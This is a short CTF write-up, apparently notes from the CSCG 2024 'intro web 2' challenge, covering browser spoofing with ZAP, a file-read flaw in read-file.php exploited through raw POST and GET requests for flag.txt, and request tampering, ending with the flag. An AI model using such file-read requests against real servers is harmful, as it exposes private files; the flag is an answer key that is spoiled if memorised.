Files
ctf/cscg24/web/intro_web_2/notes.md
2024-03-02 04:15:56 +01:00

2.3 KiB

1.Part

We can spoof our OS with the help of ZAP and get the site train.html

2. Part

There is an unsecure statistics service which shows you the content of every file you specify. We can use this to get the content of flag.txt. Sending the following request:

POST https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php HTTP/1.1
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
content-length: 17
Origin: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
Connection: keep-alive
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

filename=flag.txt

Yields the page statistics_console.html

3. Part

A similar bug can be used with a GET request to get the content of the flag.txt file. This time we use a faulty php file called read-file.php

GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php?filename=flag.txt HTTP/1.1
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
content-length: 0

Returns the page statistics_console_get.html

4.Part

We now have to intercept a request made and change the authority information. When we do this we get the fourth part of the flag.

flag

CSCG{l9jj550KUaT0BVvkQ9Z39J9AW4at6R2B}